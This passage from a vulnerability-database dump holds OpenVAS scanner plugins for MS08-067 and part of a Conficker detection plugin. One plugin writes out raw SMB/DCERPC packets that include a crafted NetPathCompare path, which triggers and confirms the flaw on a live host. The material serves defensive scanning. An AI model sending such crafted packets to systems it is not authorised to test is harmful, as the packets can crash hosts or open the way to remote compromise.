are based on the above described vulnerability.\n More details regarding the worm and means to resolve this can be found at,\n http://technet.microsoft.com/en-us/security/dd452420.aspx\";\n\ntag_affected = \"Microsoft Windows 2K Service Pack 4 and prior.\n Microsoft Windows XP Service Pack 3 and prior.\n Microsoft Windows 2003 Service Pack 2 and prior.\";\ntag_insight = \"Flaw is due to an error in the Server Service, that does not properly\n handle specially crafted RPC requests.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download\n and update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS08-067.\";\n\n##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms08-067_900056.nasl 7551 2017-10-24 12:24:05Z cfischer $\n# Description: Vulnerability in Server Service Could Allow Remote Code Execution (958644)\n#\n# Authors:\n# Chandan S <schandan@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2008 SecPod, http://www.secpod.com\n#\n# Updated By: Madhuri D <dmadhuri@secpod.com> on 2012-02-29\n# - Update the code to work on windows 2003-SP2 (32/64 bit) os\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n##############################################################################\n\nif(description)\n{\n script_id(900056);\n script_version(\"$Revision: 7551 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 14:24:05 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-10-30 14:46:44 +0100 (Thu, 30 Oct 2008)\");\n script_bugtraq_id(31874);\n script_cve_id(\"CVE-2008-4250\");\n script_copyright(\"Copyright (C) 2008 SecPod\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_DENIAL);\n script_family(\"Windows : Microsoft Bulletins\");\n script_name(\"Vulnerability in Server Service Could Allow Remote Code Execution (958644)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/32326\");\n script_xref(name : \"URL\" , value : \"http://www.kb.cert.org/vuls/id/827267\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/46040\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id?1021091\");\n script_xref(name : \"URL\" , value : \"http://blogs.securiteam.com/index.php/archives/1150\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx\");\n\n script_dependencies(\"secpod_reg_enum.nasl\", \"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"Host/runs_windows\");\n script_exclude_keys(\"SMB/samba\");\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nif(safe_checks()){\n exit(0);\n}\n\n## Variable Initialization\nname = \"\";\nlogin = \"\";\npass = \"\";\ndomain = \"\";\nport = \"\";\nr = \"\";\nprot = \"\";\nuid = \"\";\ntid = \"\";\ntid_high = \"\";\ntid_low = \"\";\nuid_high = \"\";\nuid_low = \"\";\nfid_low = \"\";\nfid_high = \"\";\nfid2_low = \"\";\nfid2_high = \"\";\nsmb_nt_andx_req = \"\";\nsmb_nt_andx_resp = \"\";\ndcerpc_bind_srvsvc_req = \"\";\ndcerpc_bind_srvsvc_resp = \"\";\nsmb_andx_req = \"\";\nsmb_andx_resp = \"\";\nsmb_nt_andx_req1 = \"\";\nsmb_nt_andx_resp1 = \"\";\ndcerpc_bind_wkssvc_req = \"\";\ndcerpc_bind_wkssvc_resp = \"\";\nsmb_andx_req1 = \"\";\nsmb_andx_resp1 = \"\";\nnetdeluse_req = \"\";\nnetdeluse_resp = \"\";\nnetpath_cmp_req = \"\";\nnetpath_cmp_resp = \"\";\nsmb_tree_dis_req = \"\";\nsmb_tree_dis_resp = \"\";\nsmb_logoff_req = \"\";\nsmb_logoff_resp = \"\";\n\nname = kb_smb_name();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\nport = kb_smb_transport();\n\nsoc = open_sock_tcp(port);\nif(!soc){\n exit(0);\n}\n\nif(!login)login = \"\";\nif(!pass) pass = \"\";\n\nr = smb_session_request(soc:soc, remote:name);\nif(!r) { close(soc); exit(0); }\n\nprot = smb_neg_prot(soc:soc);\nif(!prot){ close(soc); exit(0); }\n\nr = smb_session_setup(soc:soc, login:login, password:pass, domain:domain, prot:prot);\nif(!r)\n{\n close(soc);\n exit(0);\n}\n\nuid = session_extract_uid(reply:r);\nif(!uid)\n{\n close(soc);\n exit(0);\n}\n\nr = smb_tconx(soc:soc, uid:uid, share:\"IPC$\", name:name);\nif(!r)\n{\n close(soc);\n exit(0);\n}\n\ntid = tconx_extract_tid(reply:r);\nif(!tid)\n{\n close(soc);\n exit(0);\n}\n\ntid_high = tid / 256;\ntid_low = tid % 256;\nuid_high = uid / 256;\nuid_low = uid % 256;\n\n## SMB NT Create AndX Request, Path: \\browser\nsmb_nt_andx_req = raw_string(0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42,\n 0xa2, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xd9,\n 0x46, uid_low, uid_high, 0x00, 0x01, 0x18, 0xff,\n 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x16, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9f, 0x01,\n 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00,\n 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x40, 0x00,\n 0x40, 0x00, 0x02, 0x00, 0x00, 0x00, 0x03, 0x13,\n 0x00, 0x00, 0x5c, 0x00, 0x62, 0x00, 0x72, 0x00,\n 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x65, 0x00,\n 0x72, 0x00, 0x00, 0x00);\n\nsend(socket:soc, data:smb_nt_andx_req);\n\n## Check the response\nsmb_nt_andx_resp = smb_recv(socket:soc);\n\nif(smb_nt_andx_resp && strlen(smb_nt_andx_resp) < 107)\n{\n close(soc);\n exit(0);\n}\n\n## Get fid from response\nfid_low = ord(smb_nt_andx_resp[42]);\nfid_high = ord(smb_nt_andx_resp[43]);\n\n## DCERPC Bind: call_id: 0 SRVSVC V3.0\ndcerpc_bind_srvsvc_req = raw_string(0x00, 0x00, 0x00, 0x88, 0xff, 0x53, 0x4d,\n 0x42, 0x2f, 0x00, 0x00, 0x00, 0x00, 0x18,\n 0x03, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n tid_low, tid_high, 0xd9, 0x46, uid_low,\n uid_high, 0x40, 0x01, 0x0e, 0xff, 0x00,\n 0x00, 0x00, fid_low, fid_high, 0x00, 0x00,\n 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x08,\n 0x00, 0x48, 0x00, 0x00, 0x00, 0x48, 0x00,\n 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x05, 0x00, 0x0b, 0x03, 0x10,\n 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0xb8, 0x10, 0xb8,\n 0x10, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0xc8,\n 0x4f, 0x32, 0x4b, 0x70, 0x16, 0xd3, 0x01,\n 0x12, 0x78, 0x5a, 0x47, 0xbf, 0x6e, 0xe1,\n 0x88, 0x03, 0x00, 0x00, 0x00, 0x04, 0x5d,\n 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f,\n 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,\n 0x02, 0x00, 0x00, 0x00);\n\nsend(socket:soc, data:dcerpc_bind_srvsvc_req);\n\n## Check the response\ndcerpc_bind_srvsvc_resp = smb_recv(socket:soc);\n\nif(!dcerpc_bind_srvsvc_resp)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Read AndX Request\nsmb_andx_req = raw_string(0x00, 0x00, 0x00, 0x3c, 0xff, 0x53, 0x4d, 0x42,\n 0x2e, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xd9,\n 0x46, uid_low, uid_high, 0x80, 0x01, 0x0c, 0xff,\n 0x00, 0x00, 0x00, fid_low, fid_high, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x04, 0x00, 0x04, 0xff, 0xff,\n 0xff, 0xff, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00);\n\nsend(socket:soc, data:smb_andx_req);\n\n## Check the response\nsmb_andx_resp = smb_recv(socket:soc);\n\nif(!smb_andx_resp)\n{\n close(soc);\n exit(0);\n}\n\n## SMB NT Create AndX Request, Path: \\browser\nsmb_nt_andx_req1 = raw_string(0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42,\n 0xa2, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xd9,\n 0x46, uid_low, uid_high, 0x00, 0x01, 0x18, 0xff,\n 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x16, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9f, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00,\n 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x40, 0x00,\n 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x03, 0x13,\n 0x00, 0x00, 0x5c, 0x00, 0x62, 0x00, 0x72, 0x00,\n 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x65, 0x00,\n 0x72, 0x00, 0x00, 0x00);\n\nsend(socket:soc, data:smb_nt_andx_req1);\n\n##Check the response\nsmb_nt_andx_resp1 = smb_recv(socket:soc);\n\nif(smb_nt_andx_resp1 && strlen(smb_nt_andx_resp1) < 107)\n{\n close(soc);\n exit(0);\n}\n\n## Get the FID from response\nfid2_low = ord(smb_nt_andx_resp1[42]);\nfid2_high = ord(smb_nt_andx_resp1[43]);\n\n## DCERPC Bind: call_id: 1 WKSSVC V1.0\ndcerpc_bind_wkssvc_req = raw_string(0x00, 0x00, 0x00, 0x88, 0xff, 0x53, 0x4d,\n 0x42, 0x2f, 0x00, 0x00, 0x00, 0x00, 0x18,\n 0x03, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n tid_low, tid_high, 0xd9, 0x46, uid_low,\n uid_high, 0x00, 0x02, 0x0e, 0xff, 0x00,\n 0x00, 0x00, fid2_low, fid2_high, 0x00,\n 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff,\n 0x08, 0x00, 0x48, 0x00, 0x00, 0x00, 0x48,\n 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x49, 0x00, 0x00, 0x05, 0x00, 0x0b, 0x03,\n 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x10,\n 0xb8, 0x10, 0x00, 0x00, 0x00, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,\n 0x98, 0xd0, 0xff, 0x6b, 0x12, 0xa1, 0x10,\n 0x36, 0x98, 0x33, 0x46, 0xc3, 0xf8, 0x7e,\n 0x34, 0x5a, 0x01, 0x00, 0x00, 0x00, 0x04,\n 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,\n 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48,\n 0x60, 0x02, 0x00, 0x00, 0x00);\n\nsend(socket:soc, data:dcerpc_bind_wkssvc_req);\n\n## Check the response\ndcerpc_bind_wkssvc_resp = smb_recv(socket:soc);\n\nif(!dcerpc_bind_wkssvc_resp)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Read AndX Request\nsmb_andx_req1 = raw_string(0x00, 0x00, 0x00, 0x3c, 0xff, 0x53, 0x4d, 0x42,\n 0x2e, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xd9,\n 0x46, uid_low, uid_high, 0x40, 0x02, 0x0c, 0xff,\n 0x00, 0x00, 0x00, fid2_low, fid2_high, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x04, 0x00, 0x04, 0xff, 0xff,\n 0xff, 0xff, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00);\n\nsend(socket:soc, data:smb_andx_req1);\n\n## Check the response\nsmb_andx_resp1 = smb_recv(socket:soc);\n\nif(!smb_andx_resp1)\n{\n close(soc);\n exit(0);\n}\n\n## SRVSVC NetPathCompare request\nnetpath_cmp_req= raw_string(0x00, 0x00, 0x01, 0x10, 0xff, 0x53, 0x4d, 0x42,\n 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xd9,\n 0x46, uid_low, uid_high, 0xc0, 0x02, 0x10, 0x00,\n 0x00, 0xbc, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x54, 0x00, 0xbc, 0x00, 0x54,\n 0x00, 0x02, 0x00, 0x26, 0x00, fid_low, fid_high,\n 0xcd, 0x00, 0x00, 0x5c, 0x00, 0x50, 0x00, 0x49,\n 0x00, 0x50, 0x00, 0x45, 0x00, 0x5c, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x03, 0x10,\n 0x00, 0x00, 0x00, 0xbc, 0x00, 0x00, 0x00, 0x03,\n 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x00, 0x00, 0x02, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2f,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2f,\n 0x00, 0x00, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x41,\n 0x00, 0x41, 0x00, 0x41, 0x00, 0x41, 0x00, 0x41,\n 0x00, 0x41, 0x00, 0x41, 0x00, 0x41, 0x00, 0x41,\n 0x00, 0x41, 0x00, 0x41, 0x00, 0x41, 0x00, 0x41,\n 0x00, 0x41, 0x00, 0x41, 0x00, 0x41, 0x00, 0x41,\n 0x00, 0x41, 0x00, 0x41, 0x00, 0x41, 0x00, 0x41,\n 0x00, 0x41, 0x00, 0x41, 0x00, 0x41, 0x00, 0x41,\n 0x00, 0x41, 0x00, 0x41, 0x00, 0x41, 0x00, 0x41,\n 0x00, 0x41, 0x00, 0x41, 0x00, 0x41, 0x00, 0x41,\n 0x00, 0x41, 0x00, 0x5c, 0x00, 0x2e, 0x00, 0x2e,\n 0x00, 0x5c, 0x00, 0x4f, 0x00, 0x70, 0x00, 0x65,\n 0x00, 0x6e, 0x00, 0x56, 0x41, 0x53, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x5c,\n 0x00, 0x4f, 0x00, 0x70, 0x00, 0x65, 0x00, 0x6e,\n 0x00, 0x56, 0x41, 0x53, 0x00, 0x00, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend(socket:soc, data:netpath_cmp_req);\n\n## Check the response\nnetpath_cmp_resp = smb_recv(socket:soc);\n\nif(!netpath_cmp_resp)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Tree Disconnect Request\nsmb_tree_dis_req = raw_string(0x00, 0x00, 0x00, 0x23, 0xff, 0x53, 0x4d, 0x42,\n 0x71, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xd9,\n 0x46, uid_low, uid_high, 0x00, 0x03, 0x00, 0x00,\n 0x00);\n\nsend(socket:soc, data:smb_tree_dis_req);\n\n## Check the response\nsmb_tree_dis_resp = smb_recv(socket:soc);\n\nif(!smb_tree_dis_resp)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Logoff AndX Request\nsmb_logoff_req = raw_string(0x00, 0x00, 0x00, 0x27, 0xff, 0x53, 0x4d, 0x42,\n 0x74, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd9, 0x46,\n uid_low, uid_high, 0x40, 0x03, 0x02, 0xff, 0x00,\n 0x00, 0x00, 0x00, 0x00);\n\nsend(socket:soc, data:smb_logoff_req);\n\n## Check the response\nsmb_logoff_resp = smb_recv(socket:soc);\n\nif(!smb_logoff_resp)\n{\n close(soc);\n exit(0);\n}\n\n## Checking netpath_cmp_resp, to confirm the vuln\n## After applying the patch, netpath_cmp_resp contains,\n## Windows Error: WERR_INVALID_NAME (0x0000007b)\nif(ord(netpath_cmp_resp[84]) == 00 && ord(netpath_cmp_resp[85]) == 00 &&\n ord(netpath_cmp_resp[86]) == 00 && ord(netpath_cmp_resp[87]) == 00){\n security_message(port);\n}\n\n## Close the socket\nclose(soc);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:26", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS08-067.", "modified": "2019-05-03T00:00:00", "published": "2008-10-24T00:00:00", "id": "OPENVAS:1361412562310900055", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900055", "title": "Server Service Could Allow Remote Code Execution Vulnerability (958644)", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# Description: Server Service Could Allow Remote Code Execution Vulnerability (958644)\n#\n# Authors:\n# Chandan S <schandan@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2008 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n##############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900055\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2008-10-24 09:48:39 +0200 (Fri, 24 Oct 2008)\");\n script_bugtraq_id(31874);\n script_cve_id(\"CVE-2008-4250\");\n script_copyright(\"Copyright (C) 2008 SecPod\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Windows : Microsoft Bulletins\");\n script_name(\"Server Service Could Allow Remote Code Execution Vulnerability (958644)\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx\");\n script_xref(name:\"URL\", value:\"http://technet.microsoft.com/en-us/security/dd452420.aspx\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 2K Service Pack 4 and prior.\n\n Microsoft Windows XP Service Pack 3 and prior.\n\n Microsoft Windows 2003 Service Pack 2 and prior.\n\n Microsoft Windows Vista Service Pack 1 and prior.\n\n Microsoft Windows 2008 Service Pack 1 and prior.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to an error in the Server Service, that does not properly\n handle specially crafted RPC requests.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS08-067.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to take\n complete control of an affected system.\n\n Variants of Conficker worm are based on the above described vulnerability.\n More details regarding the worm and means to resolve this can be found at\n the linked references.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2k:5, xp:4, win2003:3, winVista:3, win2008:3) <= 0){\n exit(0);\n}\n\nif(hotfix_missing(name:\"958644\") == 0){\n exit(0);\n}\n\nsysPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\COM3\\Setup\",\n item:\"Install Path\");\nif(!sysPath){\n exit(0);\n}\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:sysPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\",\n string:sysPath + \"\\Netapi32.dll\");\n\ndllVer = GetVer(file:file, share:share);\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win2k:5) > 0)\n{\n if(egrep(pattern:\"^5\\.0\\.2195\\.([0-6]?[0-9]?[0-9]?[0-9]|7([01][0-9][0-9]|\" +\n \"20[0-2]))$\", string:dllVer)){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(egrep(pattern:\"^5\\.1\\.2600\\.([0-2]?[0-9]?[0-9]?[0-9]|3([0-3][0-9][0-9]|\" +\n \"4([0-5][0-9]|6[01])))$\", string:dllVer)){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n else if(\"Service Pack 3\" >< SP)\n {\n if(egrep(pattern:\"^5\\.1\\.2600\\.([0-4]?[0-9]?[0-9]?[0-9]|5([0-5][0-9][0-9]|\" +\n \"6([0-8][0-9]|9[0-3])))$\", string:dllVer)){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nif(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(egrep(pattern:\"^5\\.2\\.3790\\.([0-2]?[0-9]?[0-9]?[0-9]|3[01][0-9][0-9]|\" +\n \"32([01][0-9]|2[0-8]))$\",\n string:dllVer)){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n else if(\"Service Pack 2\" >< SP)\n {\n if(egrep(pattern:\"^5\\.2\\.3790\\.([0-3]?[0-9]?[0-9]?[0-9]|4([0-2][0-9][0-9]|\" +\n \"3([0-8][0-9]|9[01])))$\", string:dllVer)){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nsysPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\",\n item:\"PathName\");\nif(!sysPath){\n exit(0);\n}\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Netapi32.dll\");\nif(sysVer)\n{\n if(hotfix_check_sp(winVista:2) > 0)\n {\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18157\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n }\n\n else if(hotfix_check_sp(win2008:2) > 0)\n {\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18157\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-10-25T14:45:06", "bulletinFamily": "scanner", "description": "This host seems to be contaminated with infectious Conficker Worm.", "modified": "2017-10-24T00:00:00", "published": "2009-04-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=900091", "id": "OPENVAS:900091", "title": "Conficker Detection", "type": "openvas", "sourceData": "#############################################################################\n# Based on the work of Tim Brown <timb@nth-dimension.org.uk> as published\n# here, http://www.nth-dimension.org.uk/blog.php?id=72 along with the\n# associated NASL from SecPod\n#\n# Updated SRVSVC and ntrPathCanonicalize Request Packets with Description.\n# - By Chandan S\n############################################################################\n# OpenVAS Vulnerability Test\n# $Id: conficker.nasl 7551 2017-10-24 12:24:05Z cfischer $\n#\n# Conficker Detection\n#\n# Authors:\n# Chandan S <schandan@secpod.com>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_insight = \"Conficker is a worm that spreads on Windows Platforms. This malware could\nspread Windows file shares protected with weak passwords or to which a\nlogged on domain administrator has access, by copying itself to removable\nstorage devices and by exploiting the MS08-067 Windows Server service\nvulnerability.\n\nThis malware generates infections files to set up to run as a service and\nalso using a random name when Windows starts under system32, and tries to\nmodify permissions on the service registry entries so that they are not\nvisible to the user. Such registry entries are under,\n'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost' and\n'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\RANDOM_SERVICE_NAME'\n\nThe plugin determines Conficker variants B or C. It likeley works against systems\nthat allow anonymous login, otherwise Credentials can be supplied.\";\n\ntag_impact = \"Successful exploitation could allow remote attackers to take complete\ncontrol of an affected system and capable of stealing all kind of sensitive\ninformation and can even spread across the Network.\nImpact Level: System/Network.\";\ntag_affected = \"Microsoft Windows 2K Service Pack 4 and prior.\nMicrosoft Windows XP Service Pack 3 and prior.\nMicrosoft Windows 2003 Service Pack 2 and prior.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download\nand update mentioned hotfixes in the advisory from the below link,\nhttp://www.microsoft.com/technet/security/bulletin/ms08-067.mspx\n and\nUse Conficker Removal Tools, or Known Security Products to remove\nconficker worm.\";\ntag_summary = \"This host seems to be contaminated with infectious Conficker Worm.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www.dshield.org/diary.html?storyid=5860\");\n script_xref(name : \"URL\" , value : \"http://www.anti-spyware-101.com/remove-conficker\");\n script_xref(name : \"URL\" , value : \"http://iv.cs.uni-bonn.de/wg/cs/applications/containing-conficker/\");\n script_xref(name : \"URL\" , value : 